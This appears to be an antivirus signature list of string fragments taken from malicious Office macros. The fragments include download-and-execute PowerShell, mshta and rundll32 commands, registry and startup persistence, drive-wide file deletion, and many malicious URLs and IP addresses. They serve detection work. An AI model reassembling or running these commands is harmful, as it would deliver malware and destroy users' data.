 - http://20glorymmausa.com/A/stanzer.exe (MACROHSTR_EXT)
 - http://hindold.com/ (MACROHSTR_EXT)
 - http://pudroted.com/ (MACROHSTR_EXT)
 - http://download.sabaloo.com/css/libatk-1.0-0.dat (MACROHSTR_EXT)
 - http://systiant.com/ (MACROHSTR_EXT)
 - http://dubriah.com/ (MACROHSTR_EXT)
 - http://fibare.com/ (MACROHSTR_EXT)
 - netstat_report\ (MACROHSTR_EXT)
 - .cmd" (MACROHSTR_EXT)
 - StartProcess "c:\ (MACROHSTR_EXT)
 - .xml" (MACROHSTR_EXT)
 - Documents.Add(ActiveDocument. (MACROHSTR_EXT)
 -  = "c:\netstat_report\ (MACROHSTR_EXT)
 - \active" (MACROHSTR_EXT)
 - DiskDrive\1\Volume\ (MACROHSTR_EXT)
 - corpfastindustries.com/ (MACROHSTR_EXT)
 - .CreateTextFile(vPath & "\ (MACROHSTR_EXT)
 -  .txt") (MACROHSTR_EXT)
 - KARTIC = "://www.bitly.com/" (MACROHSTR_EXT)
 - z = "http://4GP.ME/bltc/1590074596521.txt" (MACROHSTR_EXT)
 - = WinExec("cmd.exe /c mshta " & z, 0) (MACROHSTR_EXT)
 - = " http://1230948%1230948@j.mp/ (MACROHSTR_EXT)
 - : Shell ("ping.exe") (MACROHSTR_EXT)
 - = " https://1230948%1230948@bitly.com/awkdhikhasd" (MACROHSTR_EXT)
 - = ggg + lululu + tititi + "ta http://%20%20@j.mp/ (MACROHSTR_EXT)
 - meinkonhun.EXEC pings (MACROHSTR_EXT)
 - = " H" + D + D + L + "://" + K + T (MACROHSTR_EXT)
 - = "/%911%911%911%911%911@j.mp\kasdasjxiaksddkadsdskdd" (MACROHSTR_EXT)
 - Debug.Print (VBA.Shell(VPhpgRQZY + Ow2IUVEOa + wwhRKB94OflBEHVhu + OflBEHVhu)) (MACROHSTR_EXT)
 - = "j" + "." + "m" + "p/" (MACROHSTR_EXT)
 - : meinkonhun.EXEC pings (MACROHSTR_EXT)
 - Yahoodi.STARTON (MACROHSTR_EXT)
 - VBA.Shell(KCKR0hJiP + iJlPvslnp + smY1Dcdfl + XgdlIhOWY)) (MACROHSTR_EXT)
 - = " http://%8234%8234@j.mp/ddkslasdjalsjdasnw" (MACROHSTR_EXT)
 - = " http://1230948%1230948@j.mp/wasajsidjasdasdkoocs" (MACROHSTR_EXT)
 - = "e http://achoteis.com.br/images/atendimento.txt" (MACROHSTR_EXT)
 - = StrReverse(SReverseMod("p/.m@j480923%1480923/1:/tpht ") (MACROHSTR_EXT)
 - Shell StrReverse(SReverseMod("tash m/cd cm")) (MACROHSTR_EXT)
 - ("fyf/ssjj") (MACROHSTR_EXT)
 - Z=environ$("appdata")&"\"& (MACROHSTR_EXT)
 - ("fyf/ (MACROHSTR_EXT)
 - 0npd/hojmsvi.tk/xxx00;tquui") (MACROHSTR_EXT)
 - ActiveDocument.Unprotect " (MACROHSTR_EXT)
 -  + "exec( (MACROHSTR_EXT)
 - .urlopen( (MACROHSTR_EXT)
 - .Request('http://crphone.mireene.com (MACROHSTR_EXT)
 - cmd = cmd + "exec(urllib2.urlopen(urllib2.Request('http:// (MACROHSTR_EXT)
 - _.read()) (MACROHSTR_EXT)
 -  = "\svchost" + Str( (MACROHSTR_EXT)
 - ) + ".exe" (MACROHSTR_EXT)
 - ShellExecute( (MACROHSTR_EXT)
 - GetObject("WiNmGmTs:{ImPeRsOnAtIoNlEvEl=ImPeRsOnAtE}!\\.\RoOt\CiMv2 (MACROHSTR_EXT)
 - .Get("wIn32_pRoCeSs (MACROHSTR_EXT)
 - ":" + "/" + "/" + "g" + "r" + "o" + "u" + "p" + "s" + "." + "u" + "s" + "." + "t" + "o" + ":" + "6" + "9" + "/" + "0" + "3" + "." + "h" + "t" + "m (MACROHSTR_EXT)
 - RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ (MACROHSTR_EXT)
 - %:" + "\" + "\" + "j" + "." + "m" + "p" + "\ (MACROHSTR_EXT)
 - " & ".jse" (MACROHSTR_EXT)
 -  = "c:\Rewi_Cool\ (MACROHSTR_EXT)
 -  = "c:\User_Foto\ (MACROHSTR_EXT)
 - 30.3.11.23.20.9.30.9 (MACROHSTR_EXT)
 - VBA.Shell ( (MACROHSTR_EXT)
 - VBA.Environ$("COMSPEC") (MACROHSTR_EXT)
 - ShellExecute (MACROHSTR_EXT)
 - https://dangerously. (MACROHSTR_EXT)
 - svc.dll (MACROHSTR_EXT)
 - http://grars.com/ (MACROHSTR_EXT)
 - http://tamboe.net/ (MACROHSTR_EXT)
 - http://retoh.com/ (MACROHSTR_EXT)
 - http://kwatov.com/ (MACROHSTR_EXT)
 - .OLEObjects("Object (MACROHSTR_EXT)
 - ").Copy (MACROHSTR_EXT)
 - MkDir "C:" + "\KB4" + " (MACROHSTR_EXT)
 - CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - Shell.Run "SchTasks /Create /SC (MACROHSTR_EXT)
 - CopyFile Environ("Temp") & "\KB4" + (MACROHSTR_EXT)
 -  = CreateObject("WSCript.shell") (MACROHSTR_EXT)
 - bigmir.host/ (MACROHSTR_EXT)
 - Windows/Temp/ (MACROHSTR_EXT)
 -  .exe" (MACROHSTR_EXT)
 - .savetofile "C:// (MACROHSTR_EXT)
 - Windows\Temp\ (MACROHSTR_EXT)
 - .Run """C:\ (MACROHSTR_EXT)
 - = "c:\InstallShield\" (MACROHSTR_EXT)
 - " & ".bat" (MACROHSTR_EXT)
 - = "c:\Datainv\" (MACROHSTR_EXT)
 - a-zA-Z = ActiveDocument.Tables( (MACROHSTR_EXT)
 - 0-9).Cell( (MACROHSTR_EXT)
 - 0-9).Range (MACROHSTR_EXT)
 - a-zA-Z.Text,  (MACROHSTR_EXT)
 - .Text) -  (MACROHSTR_EXT)
 - a-zA-Z).ShellExecute  (MACROHSTR_EXT)
 - .TextRetrievalMode.IncludeHiddenText = True (MACROHSTR_EXT)
 - l")), CommandButton1.Caption, (MACROHSTR_EXT)
 - & "\" & Me.Name &  (MACROHSTR_EXT)
 -  & ". (MACROHSTR_EXT)
 - Button1.Caption, (MACROHSTR_EXT)
 - 178.62.41.37:4444/ (MACROHSTR_EXT)
 - .savetofile " (MACROHSTR_EXT)
 - Shell ("cmd /c D:\Users\ (MACROHSTR_EXT)
 - \Documents\ (MACROHSTR_EXT)
 - .exe ") (MACROHSTR_EXT)
 - lineText = singleLine.Range.Text (MACROHSTR_EXT)
 - , 2 - 2.1 (MACROHSTR_EXT)
 - transvale.sslblindado.com/ (MACROHSTR_EXT)
 - .html (MACROHSTR_EXT)
 - InParameters.SpawnInstance (MACROHSTR_EXT)
 - .ExecMethod_(TC() (MACROHSTR_EXT)
 - GetObject("w" & "i" & "n" & "m" & "gmt" & "s" & ":\\" &  (MACROHSTR_EXT)
 -  & "\ro" & "ot\ci" & "mv2" & ":W" & "in3" & "2_P" & "roc" & "e" & "s" & "s").Create (MACROHSTR_EXT)
 - = ActiveDocument.Variables("d3a8e88c97d").Value (MACROHSTR_EXT)
 - Shell """" + "ms" + "hta""""https:\\%40%40@j.mp\ (MACROHSTR_EXT)
 - Shell """" + "ms" + "hta""""" + "https:\\%40%40@j.mp\ (MACROHSTR_EXT)
 - .com.br/ (MACROHSTR_EXT)
 - httphttps://maringareservas (MACROHSTR_EXT)
 - Shell "cMd /c cd %TEMP% &@echo G8e = ""http://company.superweb.ws/view/note.exe"">>Q6j.vbs &@echo W7x = N6o("" (MACROHSTR_EXT)
 - "")>>Q6j.vbs (MACROHSTR_EXT)
 - Shell "cMd /c cd %TEMP% &@echo I6l = ""http://view.superweb.ws/site/folder.exe"">>F5s.vbs &@echo D9q = S2l("" (MACROHSTR_EXT)
 - "")>>F5s.vbs (MACROHSTR_EXT)
 - = "C:\Test" (MACROHSTR_EXT)
 - .Label1.Caption (MACROHSTR_EXT)
 -  & "\ (MACROHSTR_EXT)
 - StartProcess "C:\Test\ (MACROHSTR_EXT)
 - Set xmlhttp = CreateObject("Microsoft.XMLHTTP") (MACROHSTR_EXT)
 - = ActiveDocument.CustomDocumentProperties("ipadr").Value (MACROHSTR_EXT)
 - = pvGetFile("http://" +  (MACROHSTR_EXT)
 -  + "/easydore/document/champsFusion.html?nocache=" & Now) (MACROHSTR_EXT)
 - Call displayError("UTF8_Decode", Err.Number, Err.Description) (MACROHSTR_EXT)
 - = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") (MACROHSTR_EXT)
 - objStartUp = objWMIService.Get("Win32_ProcessStartup") (MACROHSTR_EXT)
 - = objStartUp.SpawnInstance_ (MACROHSTR_EXT)
 - ).Value & Mid( (MACROHSTR_EXT)
 - .Run(IBSY_al4mysdD1rMJJL8u (MACROHSTR_EXT)
 - PMaD9btzME_qNHsjsuE = ZS (MACROHSTR_EXT)
 - kaoksdo = "C:\Users\Public\zaim.js" (MACROHSTR_EXT)
 - Sheet1.Range ("O229") (MACROHSTR_EXT)
 - wsh.Run FgbV45g & (MACROHSTR_EXT)
 - .ShellExecute "P" + IibYCmmXU(fjkerooos), IibYCmmXU(fgfjhfgfg), "", "", 0 (MACROHSTR_EXT)
 - xHttp.Open "GET", "http://167.99.50.129/charlotte.dll", False (MACROHSTR_EXT)
 - .savetofile "C:\Temp\charlotte.dll", (MACROHSTR_EXT)
 - Shell ("rundll32 C:\Temp\charlotte.dll, vOuovKMj") (MACROHSTR_EXT)
 - .Open "GET", "https://filebin.net/5ms6k4uno7qx6itc/fortnite.exe", False (MACROHSTR_EXT)
 - .savetofile ("C:\Programdata\fortnite.exe"), 2 (MACROHSTR_EXT)
 - Shell ("C:\Programdata\Fortnite.exe (MACROHSTR_EXT)
 - mas = "/%911%911%911%911%911@j.mp\kasasdsdsasdasdd (MACROHSTR_EXT)
 - mas = "/%911%911%911%911%911@j.mp\kasasxansxnasxidskdd (MACROHSTR_EXT)
 - 5("fwjsEnfutzT")) & Environ( (MACROHSTR_EXT)
 - ("iubQfnpI")) & Application.PathSeparator &  (MACROHSTR_EXT)
 - ("qpultfE") & Application.PathSeparator &  (MACROHSTR_EXT)
 - ("mme/fnbofmjg") (MACROHSTR_EXT)
 - DkasdaSS = "rundll32" (MACROHSTR_EXT)
 - %\pm.j\\:sptth""""      athsm""") (MACROHSTR_EXT)
 - CreateObject("WScript.shell") (MACROHSTR_EXT)
 - nnq.novonordisk.com\web\NNSOPAddIn\QualityDocumentAddIn\setup.exe (MACROHSTR_EXT)
 - .Run ( (MACROHSTR_EXT)
 - .\root\default:StdRegProv (MACROHSTR_EXT)
 - .RegDelete ( (MACROHSTR_EXT)
 - = ("W" + "S" + "c" + "ript.Shell") (MACROHSTR_EXT)
 - '*'d'*'d\p'*'.j\\:ptth""""aths'*'""") (MACROHSTR_EXT)
 - Av4gsiPl_3.glvg3XItpsALCu87_gp2K8AHee5im (MACROHSTR_EXT)
 - pL_EHxmWz_VCD_DwXWo.Lg_O_qfOKeZhaGhFJGfQlHtB5 (MACROHSTR_EXT)
 - .Run(IBSY_al4mysdD1rMJJL8u_GXee_KjngNMZr (MACROHSTR_EXT)
 - zuQkQxuNb5D_RW.oiKpJXHGAtdZYRhWn55D (MACROHSTR_EXT)
 - Coys_i.uNP_f_k_ugdJb_k9FHkj (MACROHSTR_EXT)
 - .Run(mrD_R_aLueF4, vBZ___jU4KPUTw) (MACROHSTR_EXT)
 - E5EN_.SodUux_REp__Z_ARCqyP (MACROHSTR_EXT)
 - .Run(OynIwt4NYsXQHU, fu7UhGaUpAhRarZEI) (MACROHSTR_EXT)
 - .Run(idimqszsifynt, rtccibnugxqvtcwtilrbgqhcwke) (MACROHSTR_EXT)
 - U__27jWt2.y_OqwD9Oaak_TKKAJwhk (MACROHSTR_EXT)
 - .Run(LWVoZiBZ_N_, H3leXgsyKY_EyTmc) (MACROHSTR_EXT)
 - WbQZrn8I4K_Z53_JUxSMOuOp38z9_.jtsg9vP_6j7DIoJnHmEiH4PaM (MACROHSTR_EXT)
 - m7K_ZdKWYwDhiaMS_h4_D8Ym_99.W46_mWegKSVz_wu_F2oVTUjIUKEQE (MACROHSTR_EXT)
 - = opopo + mksmdas + jdsakdaw + "ta http://%20%20@j.mp/ (MACROHSTR_EXT)
 - = feixbto + so1 + ho2 + "ta http://%20%20@j.mp/sdhja67xzhjdas" (MACROHSTR_EXT)
 - ysbjIBITlH8SKLbIB_K.AgPY5FeQh_eDuy65uvTuEd (MACROHSTR_EXT)
 - = "Wscript.Shell" (MACROHSTR_EXT)
 - LeXmaPeaK.ot9_YlQ_Nw7lVBupf_PT (MACROHSTR_EXT)
 - .Run(Dgi9_BcugUYt6_, GJW7Z_SBr1_WxgJAY3cUE) (MACROHSTR_EXT)
 - = other & "\zx.exe" (MACROHSTR_EXT)
 -  = "ile('http://onedrivenet.xyz/work/30.vbs'," (MACROHSTR_EXT)
 - CreateObject(fuckzargus).Exec luli1 + luli2 (MACROHSTR_EXT)
 - = Environ("tmp") & "\main.theme" (MACROHSTR_EXT)
 - a-z0-9 = New MSXML2.XMLHTTP60 (MACROHSTR_EXT)
 - a-z0-9.Open("GET",  (MACROHSTR_EXT)
 - u5 = "msgbox/rm" + "sh" + "ta " (MACROHSTR_EXT)
 - coooo = ShellExecute _ (MACROHSTR_EXT)
 - u7 = "y.com/asdodo" (MACROHSTR_EXT)
 - URLDownloadToFile 0, "http://9nag0.com/unbbmevd/d76.php?l=oev2.cab", Py, 0, 0 (MACROHSTR_EXT)
 - URLDownloadToFile 0, "http://5u2mr.com/unbbmevd/d76.php?l=oev4.cab", Ga, 0, 0 (MACROHSTR_EXT)
 - URLDownloadToFile 0, "http:// (MACROHSTR_EXT)
 - .com/unbbmevd/d76.php?l=oev4.cab", Ga, 0, 0 (MACROHSTR_EXT)
 - strLine = Environ$("USERPROFILE") + "\ (MACROHSTR_EXT)
 - strLine2 = Environ$(ChrW(65) + ChrW(80) + ChrW(80) + ChrW(68) + ChrW(65) + ChrW(84) + ChrW(65)) + "\" + Environ$(ComName) + "\" + Environ$(ComName) (MACROHSTR_EXT)
 - .create Right(ThisDocument.DefaultTargetFrame + " -decode ", 17) + strLine + ChrW(46) + ChrW(120) + ChrW(108) + ChrW(115) + " " + strLine + ".dll (MACROHSTR_EXT)
 - .create Right("cc85g78c89f799bcafb88a9eggebc6fag87rundll32 ", 9) + strLine & ".dll,EntryPoint", (MACROHSTR_EXT)
 - ^owershell.exe $Mo=@( (MACROHSTR_EXT)
 - obj1.Run s & miz (MACROHSTR_EXT)
 - $t=[System.Text.Encoding]::ASCII.GetString($Mo)|IEX (MACROHSTR_EXT)
 - C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB (PEHSTR_EXT)
 - C:\Archivos de programa\Microsoft Visual Studio\VB98\VB6.OLB (PEHSTR_EXT)
 - powershell.exe ""IEX ((new-object net.webclient).downloadstring('https://drive.google.com/uc?id=1fxj2_ITnq1Yb6QbXw3HncRuwFAB8wN47&export=download (MACROHSTR_EXT)
 - = Shell("PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.greyhathacker.net/tools/ (MACROHSTR_EXT)
 -  .exe',' (MACROHSTR_EXT)
 -  .exe');Start-Process ' (MACROHSTR_EXT)
 -  .exe'", vbNormalFocus) (MACROHSTR_EXT)
 - = " http://maringareservas.com.br/mac.hta" (MACROHSTR_EXT)
 - CreateObject("Wscript.shell").exec@( (MACROHSTR_EXT)
 - ((WScript.Echo() (MACROHSTR_EXT)
 - A1:IV5000].SpecialCells(xlConstants) (MACROHSTR_EXT)
 - Open "c:\ProgramData\hhheader.wpf" (MACROHSTR_EXT)
 - UserForm1.Label1.Caption = "c:\ProgramData\hhheader.wpf" (MACROHSTR_EXT)
 - = CreateObject("w" & CommandButton2.Caption & "." & CommandButton3.Caption) (MACROHSTR_EXT)
 - & " /W hidden /C $TempDir = [Environment]::GetFolderPath('ApplicationData') (MACROHSTR_EXT)
 - (New-Object System.Net.WebClient).DownloadFile (MACROHSTR_EXT)
 - https://bitbucket.org/artanoGuima/onemore/downloads/payloadEmail.exe (MACROHSTR_EXT)
 - Start-Process 'WindowsDefenderModule.exe (MACROHSTR_EXT)
 - obj3.ShellExecute "rundll32 (MACROHSTR_EXT)
 - TejEna = Dir("C:\aaa_TouchMeNot.txt") (MACROHSTR_EXT)
 - GetObject(StrReverse("ss" + "ec" + "orP_" + "23n" + "iW" + ":2" + "vmi" + "c\t" + "oor:" + "stm" + "gm" + "n" + "iw")) (MACROHSTR_EXT)
 - Application.ExecuteExcel4Macro(TempC) (MACROHSTR_EXT)
 - Set Ieraj = GetObject("winmgmts:").Get("Win32_PingS" (MACROHSTR_EXT)
 - = "C:\Users\" & Environ("UserName") & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ (MACROHSTR_EXT)
 - = Environ("TEMP") + "\" + RandName( (MACROHSTR_EXT)
 - .CreateTextFile(pathAuto + "update.bat") (MACROHSTR_EXT)
 - = ActiveDocument.Shapes(1).TextFrame.TextRange.Text (MACROHSTR_EXT)
 - = pathData & "\vshostvba.cry" (MACROHSTR_EXT)
 - CreateObject("WScript.Shell").Exec pathData & "\ (MACROHSTR_EXT)
 - .Write Chr(Asc(objStreamIn.Read(1)) Xor  (MACROHSTR_EXT)
 - DH66OPQX7N("ubc/ (MACROHSTR_EXT)
 - hoq/5555550tsptsvd0tfttbmd0ttj (MACROHSTR_EXT)
 - DH66OPQX7N("fyf/ (MACROHSTR_EXT)
 - .CreateTextFile(Environ$("HOMEPATH") & "\\" & "AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pepsi.bat", (MACROHSTR_EXT)
 - .Write  (MACROHSTR_EXT)
 - & " -f -decode ""C:%HOMEPATH%\dWifi" (MACROHSTR_EXT)
 - .CreateTextFile(Environ$("HOMEPATH") & "\\" & "dWifi", (MACROHSTR_EXT)
 - RR.K "regsvr" & 32 & " " & E(I, 1) (MACROHSTR_EXT)
 - Hruort = saveFolder & "\Gertos.cmd" (MACROHSTR_EXT)
 - saveFolder = "C:\programdata (MACROHSTR_EXT)
 - .Path & "\Primer.txt" For Input As (MACROHSTR_EXT)
 - "powershell.exe ""IEX ((new-object net.webclient) (MACROHSTR_EXT)
 - .downloadstring('http:// (MACROHSTR_EXT)
 - 18.141.200.95/img/payload.txt (MACROHSTR_EXT)
 - \h1.xsl" (MACROHSTR_EXT)
 - \h1.com" (MACROHSTR_EXT)
 - frm.textbox2.text (MACROHSTR_EXT)
 - .exec aqTf5d (MACROHSTR_EXT)
 - ("comments") & agHu8 (MACROHSTR_EXT)
 - Environ("LOCALAPPDATA") & "\MicrosoftBackup" (MACROHSTR_EXT)
 - ("Shell.Application").Namespace(path1) (MACROHSTR_EXT)
 - "\MicrosoftBackup" & "\" & myname & ".exe" (MACROHSTR_EXT)
 - AppdataAddress & "\nc.exe" (MACROHSTR_EXT)
 - .Run Chr( (MACROHSTR_EXT)
 - user32.dll (MACROHSTR_EXT)
 - Debug.Print (MACROHSTR_EXT)
 - = KkNwAF6PGTSCFI2axGia5.sGDtE3YE_YT74UOD (MACROHSTR_EXT)
 - = GIoyZjr6_6YfR8E_Mgfjwdj_mpJ9RMj.KfvWmHYifShbJ0 (MACROHSTR_EXT)
 - = VaOfBpE_mKX3uo_I2l18xn.WCGDQrVs_0XkAzve_qSTrdZ (MACROHSTR_EXT)
 - = NYL0TaNG0Q5Unn0m29cAZy0tNn.ZQ6ZBcQyAeJxB100CAO2BU (MACROHSTR_EXT)
 - = yi5I2gPHMUiChJnxZyYEh0LIhk0.JvOP7Qkip5sqimgGN6J6v (MACROHSTR_EXT)
 - = rzIk0s4_Dp5E68.tfpUnym7RFLXYHpqMl5Wh (MACROHSTR_EXT)
 - = fr65eT05_DTNrozj_0kN6Qr_YaaxS3.yJD1dh6_HprsVU_fibqc6e (MACROHSTR_EXT)
 - = T02K3cjC_P8h1rS_lHmMbSB.aeDPEhLW_9If68x (MACROHSTR_EXT)
 - ActiveWindow.DocumentMap (MACROHSTR_EXT)
 - ActiveWindow.DisplayVertical (MACROHSTR_EXT)
 - Environ("tmp") & "\index.jpg" (MACROHSTR_EXT)
 - ActiveDocument.ActiveThemeDisplayName (MACROHSTR_EXT)
 - Call f499d0f8.exe (MACROHSTR_EXT)
 - Call a8a0e585.exe (MACROHSTR_EXT)
 - .Open("GET", d3395e4b, False) (MACROHSTR_EXT)
 - .Open("GET", fe32a5ca, False) (MACROHSTR_EXT)
 - 57 53 63 72 69 70 74 2E 53 68 65 6C 6C")).Run (MACROHSTR_EXT)
 - .Open "GET", "http://185.243.215.213/sys_info.vbs" (MACROHSTR_EXT)
 - savetofile "sys_info.vbs (MACROHSTR_EXT)
 - Shell "wscript sys_info.vbs (MACROHSTR_EXT)
 - Http.Send (MACROHSTR_EXT)
 - .write xHttp.responseBody (MACROHSTR_EXT)
 - :Execute( (MACROHSTR_EXT)
 - Execute(""path = path + """"data\ (MACROHSTR_EXT)
 - """" + """".txt"""""")" + vbCrLf (MACROHSTR_EXT)
 - = "C:\" + xxxxxpath + "System32\c" + "script" + ".ex" (MACROHSTR_EXT)
 - Application.Eval ( (MACROHSTR_EXT)
 - %.Run(Path + (MACROHSTR_EXT)
 - http://40.125.65.33/async.exe (MACROHSTR_EXT)
 - async.exe", 2 ' 1 (MACROHSTR_EXT)
 - ActiveWorkbook.Path & "\async.exe (MACROHSTR_EXT)
 - rundoc (tmp & "\" & ActiveDocument.Name & ".doc") (MACROHSTR_EXT)
 - = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") (MACROHSTR_EXT)
 - ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3") (MACROHSTR_EXT)
 - For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step -1 (MACROHSTR_EXT)
 - SFRUUERvd25sb2FkICJodHRwOi8vd3d3LndoZXJldmVyLmNvbS9maWxlcy9wYXlsb2FkLmV4ZSIsICJDOlx0ZW1wIg== (MACROHSTR_EXT)
 - Shell "wscript D:\_notScanned\test.vbs (MACROHSTR_EXT)
 - = "FZ.tmp" (MACROHSTR_EXT)
 - frm.fff "http://804gtd.com/hboneb/sol95.php?l=puom9.cab (MACROHSTR_EXT)
 - PL.exec Xd + "r32 (MACROHSTR_EXT)
 - Powershell.exe (MACROHSTR_EXT)
 - = Environ$("UserProfile") & "\" &  (MACROHSTR_EXT)
 - = DHlbKUIKYUGkgjHVFIum("fyf/jjsu") (MACROHSTR_EXT)
 - I-Worm.Kamila (MACROHSTR_EXT)
 - Kill "C:\kama.dll (MACROHSTR_EXT)
 - wsh.Run "C:\kam_drop.vbs (MACROHSTR_EXT)
 - DllRegisterServer (MACROHSTR_EXT)
 - C:\Huyt\Rikol\Gertik (MACROHSTR_EXT)
 - http://camilladerrico.com/fonts/reldevops.dll (MACROHSTR_EXT)
 - "ht" + "tp" + ":" + "/" + "/" + ipUrra + "/" + pay_name + ext_exe (MACROHSTR_EXT)
 - first_oct + "." + second_oct + "." + third_oct + "." + fourth_oct (MACROHSTR_EXT)
 - .Open "G" + "E" + "T", Url (MACROHSTR_EXT)
 - .Run RUNCMD (MACROHSTR_EXT)
 - MGSA = wKgOgix.Create(KbzjLCuc, Null, Null, intProcessID) (MACROHSTR_EXT)
 - cRwY = Range("C500").Comment.Text (MACROHSTR_EXT)
 - = "w" & Replace("wsconroniponton /bon /one (MACROHSTR_EXT)
 - c:\Users\Public" & Empty & "\Documents\" & "25 (MACROHSTR_EXT)
 - ll = ll & "//sherpa" (MACROHSTR_EXT)
 - ll = ll & ".rest/wp-" & Empty & Empty & "" & "info.p" (MACROHSTR_EXT)
 - .ShellExecute  (MACROHSTR_EXT)
 - ActiveDocument.Content (MACROHSTR_EXT)
 - FileName = "*.jpg ; *.jpe ; *.bmp ; *.gif ; *.avi ; *.wav ; *.mid ; *.mpg ; *.mp2 ; *.mp3 ; *.zip ; *.rar ; *.arj ; *.htm ; *.html (MACROHSTR_EXT)
 - Kill fs.FoundFiles(j) (MACROHSTR_EXT)
 - LookIn = "C:\ ; D:\ ; E:\ ; F:\ ; G:\ ; H:\ ; I:\ ; J:\ ; K:\ ; L:\ ; M:\ ; N:\ ; O:\ ; P:\ ; Q:\ ; R:\ ; S:\ ; T:\ ; U:\ ; V:\ ; W:\ ; X:\ ; Y:\ ; Z:\ (MACROHSTR_EXT)
 - WordBasic.DisableAutoMacros -1 (MACROHSTR_EXT)
 - Selection.Font.Animation = wdAnimationBlinkingBackground (MACROHSTR_EXT)
 - Kill (XLS.StartupPath + Chr(92) + Chr(66) + Chr(111) + Chr(111) + Chr(107) + Chr(49) + Chr(46)) (MACROHSTR_EXT)
 - regedit.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"", 1 (MACROHSTR_EXT)
 - UserPath & "\salaires.vbs" (MACROHSTR_EXT)
 - fso.BuildPath(targetPath, ""\tomcat3.exe"")" (MACROHSTR_EXT)
 - httpRequest.Open ""GET"", url (MACROHSTR_EXT)
 - outFile.Write Chr(Asc (MACROHSTR_EXT)
 - WshShell.Run outPath" (MACROHSTR_EXT)
 - .VB_ProcData.VB_Invoke_Func = "Project.MacroBle.AutoOpen" (MACROHSTR_EXT)
 - .SaveAs (GetPath$ + "NORMAL1.DOT") (MACROHSTR_EXT)
 -  + "cript.shell") (MACROHSTR_EXT)
 - String = "c:\programdata\ (MACROHSTR_EXT)
 - (0) + "vr32 c:\programdata\ (MACROHSTR_EXT)
 - .txt", "ws" (MACROHSTR_EXT)
 - .pdf", "ws" (MACROHSTR_EXT)
 - .Open "GET (MACROHSTR_EXT)
 - .responsebody (MACROHSTR_EXT)
 - CreateObject(storageArgLib("llehs.tpircsw")). (MACROHSTR_EXT)
 - EXEC("cmd /c po (MACROHSTR_EXT)
 - shell -w 1 (New-Object Net.WebClient).DownloadFile('http (MACROHSTR_EXT)
 - ://tinyurl.com/y3psaqmm',($env:appdata + '\ (MACROHSTR_EXT)
 - .exe'))") (MACROHSTR_EXT)
 - ocess $env:appdata\ (MACROHSTR_EXT)
 - c:\programdata\1.com (MACROHSTR_EXT)
 - c:\programdata\1.xsl (MACROHSTR_EXT)
 - frm.textbox1.text (MACROHSTR_EXT)
 - Call VBA.FileCopy(avmyIw, a62NB) (MACROHSTR_EXT)
 - ("comments") & ae0SDO (MACROHSTR_EXT)
 - = CreateObject("wscript.shell") (MACROHSTR_EXT)
 - .exec frm.CommandButton1.Tag & " c:\users\public\main.hta (MACROHSTR_EXT)
 - ie.Navigate "https://pastebin.com/raw/PMwGWkmh (MACROHSTR_EXT)
 - Dim payload: payload = ie.Document.Body (MACROHSTR_EXT)
 - = Environ("TEMP") & "\CVR (MACROHSTR_EXT)
 - objFSO.DeleteFile p (MACROHSTR_EXT)
 - obj.Document.Application.ShellExecute "rundll32 (MACROHSTR_EXT)
 - objFSO.CreateTextFile (MACROHSTR_EXT)
 - 4top.io/ (MACROHSTR_EXT)
 - .Open "GET", "https://b.top (MACROHSTR_EXT)
 - = CreateObject("WScript.Shell (MACROHSTR_EXT)
 - objShell.Run "avg.vbe (MACROHSTR_EXT)
 - = DateDiff("s", "01/01/1970 00:00:00", Now()) (MACROHSTR_EXT)
 - gethostbyname (ts & ". (MACROHSTR_EXT)
 - .cachedns.io") (MACROHSTR_EXT)
 - .FileExists(cop + "\Microsoft\EdgeFgs\FileSyncShell64.dll") (MACROHSTR_EXT)
 - .SaveToFile cop + "\Temp\wct" + CStr(wct) + ".tmp", 2 (MACROHSTR_EXT)
 - S.Dat (MACROHSTR_EXT)
 - = "CewcCewmCewd.CeweCewxCewe (MACROHSTR_EXT)
 - service.CreateObject("Wsc" & "ript.Sh (MACROHSTR_EXT)
 - ell", "").Run  (MACROHSTR_EXT)
 - http://ordinateur.ogivart.us/editor/Qpo7OAOnbe/ (MACROHSTR_EXT)
 - http://old.liceum9.ru/images/0/ (MACROHSTR_EXT)
 - http://ostadsarma.com/wp-admin/pYk64Hh3z5hjnMziZ/ (MACROHSTR_EXT)
 - http://www.cuneytkocas.com/wp-content/VSnofpES1wO2CcVob/ (MACROHSTR_EXT)
 - http://towardsun.net/admin/BYGGkrYAnT/ (MACROHSTR_EXT)
 - http://k-antiques.jp/wp-includes/SCYdA6TLohYk2/ (MACROHSTR_EXT)
 - & "lic\456trytgre3e45yrthtgr.exe (MACROHSTR_EXT)
 - Replace("cmd /c powaadrngm6rshaadrngm6ll/W 01 cu (MACROHSTR_EXT)
 - p://91.107.210.207/tinytask. (MACROHSTR_EXT)
 - ActiveSheet.Range(" (MACROHSTR_EXT)
 - ").Locked = True (MACROHSTR_EXT)
 - .Open "GET", "http://ec2-18-184-17-12.eu-central-1.compute.amazonaws.com/standardchartered/ (MACROHSTR_EXT)
 - /180821/ (MACROHSTR_EXT)
 - = Environ("Temp") & "\leakdetails.log (MACROHSTR_EXT)
 - Shell "mshta.exe javascript: (MACROHSTR_EXT)
 - =(GetObject(""script:https://raw.githubusercontent.com/SteAmeR/malwerjobs/master/scriptlet"")).Exec();close(); (MACROHSTR_EXT)
 - .OpenTextFile( (MACROHSTR_EXT)
 - DHistory of Tibet-Ladakh Relations and Their Modern Implications.docx (PEHSTR)
 - Open "C:\ProgramData\Blobers.vbs" (MACROHSTR_EXT)
 - CreateObject(ThisDocument.XMLSaveThroughXSLT) (MACROHSTR_EXT)
 - Bremen.Exec ThisDocument.DefaultTargetFrame (MACROHSTR_EXT)
 - Set b8acfabf = CreateObject("wscript.shell") (MACROHSTR_EXT)
 - Call b8acfabf.exec(a600af58) (MACROHSTR_EXT)
